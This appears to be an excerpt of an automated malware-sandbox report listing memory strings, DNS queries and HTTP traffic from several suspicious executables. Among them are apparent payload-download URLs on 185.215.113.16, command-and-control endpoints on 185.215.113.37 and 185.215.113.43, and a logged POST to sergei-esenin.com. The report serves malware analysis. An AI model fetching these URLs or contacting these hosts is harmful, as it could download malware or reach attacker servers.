Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools.debugger.remote-websocketJSON Viewer's onSave failed in startPersistence{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallback^([a-z+.-]+:\/{0,3})*([^\/@]+@).+browser.urlbar.dnsResolveFullyQualifiedNamesresource://devtools/server/devtools-server.jsFailed to execute WebChannel callback:^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)Failed to listen. Callback argument missing.^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools.performance.recording.ui-base-urlbrowser.fixup.domainsuffixwhitelist.Got invalid request to save JSON dataDevTools telemetry entry point failed: devtools/client/framework/devtools-browserNo callback set for this channel.@mozilla.org/network/protocol;1?name=file@mozilla.org/network/protocol;1?name=defaultreleaseDistinctSystemPrincipalLoader@mozilla.org/dom/slow-script-debug;1@mozilla.org/uriloader/handler-service;1^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?resource://devtools/shared/security/socket.jsUnable to start devtools server on resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URI{33d75835-722f-42c0-89cc-44f328e56a86}_injectDefaultProtocolHandlersIfNeededhttp://www.inbox.lv/rfc2368/?value=%sCan't invoke URIFixup in the content processresource://gre/modules/DeferredTask.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<https://mail.inbox.lv/compose?to=%shttps://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/NetUtil.sys.mjsgecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/JSONFile.sys.mjsisDownloadsImprovementsAlreadyMigratedhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/uriloader/local-handler-app;1handlerSvc fillHandlerInfo: don't know this typeextractScheme/fixupChangedProtocol<https://e.mail.ru/cgi-bin/sentmsg?mailto=%sScheme should be either http or httpshttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/FileUtils.sys.mjsextension/default-theme@mozilla.org/extendedDataMust have a source and a callbacknewChannel requires a single object argumentFirst argument should be an nsIInputStream@mozilla.org/intl/converter-input-stream;1@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1Non-zero amount of bytes must be specified@mozilla.org/scriptableinputstream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/handler-service;1pdfjs.previousHandler.alwaysAskBeforeHandlingVALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/network/async-stream-copier;1https://mail.yandex.ru/compose?mailto=%s@mozilla.org/uriloader/handler-service;1https://mail.yahoo.co.jp/compose/?To=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_I
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2229257788.000001C968F3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2168882791.000001C9679BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: time.windows.com
Source: global traffic DNS traffic detected: DNS query: clearancek.site
Source: global traffic DNS traffic detected: DNS query: mobbipenju.store
Source: global traffic DNS traffic detected: DNS query: eaglepawnoy.store
Source: global traffic DNS traffic detected: DNS query: dissapoiznw.store
Source: global traffic DNS traffic detected: DNS query: studennotediw.store
Source: global traffic DNS traffic detected: DNS query: bathdoomgaz.store
Source: global traffic DNS traffic detected: DNS query: spirittunek.store
Source: global traffic DNS traffic detected: DNS query: licendfilteo.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: sergei-esenin.com
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 02:01:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eIXbYTzSaB2uXFN0BtywBrDeWnsIGEy2pY%2BobjLpaP797zsVktQ8pAs77PN0wCFMh6olsJ9MNmSMFN%2FeCy9ow%2Bjh03zh6wd2LXRyVk4%2BkS8B8rA0r5IR%2B2eYf7m1UBcrVoIlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76611cb9896b58-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 02:02:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NPkIdRZfR8lNN0yv1PzvOgVFwG3MMNjzUF9iYEr3hSP3Pgkz%2BqUXmzZEvJKxWhZHgo5clr1CLqtR%2Fcp5n4pCIGSnSplZy5NiTMN%2BDwydkCzN1cp5YNVzoTXL4wCKIeAjW2UkGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76627e7de52c94-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 02:03:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLXbOUuPMLq5zYLgDqaAVE7jzyMmHZVzXav25xHBVgO8Kk7TXj4cnqIDbQA3LX21cSdcSV2h5S4N3KSqDODakx5Prgz%2B4mJvShJP5dOdWDWxhgGm6W1ANtbLAzozn0QiuJ06bQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d76635bfc1a2d3f-DFW
Source: firefox.exe, 0000001D.00000002.2122168164.000001C95726D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573396537.000000000598E000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/F
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/O
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/P
Source: file.exe, file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180894014.00000000059AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe7Q$
Source: 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeD
Source: file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeq
Source: file.exe, file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exea
Source: file.exe, file.exe, 00000000.00000003.1573333349.0000000001204000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe2
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exeages
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/c4
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwq
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ntdesk
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37t
Source: skotes.exe, 00000007.00000003.2253149939.0000000000F23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
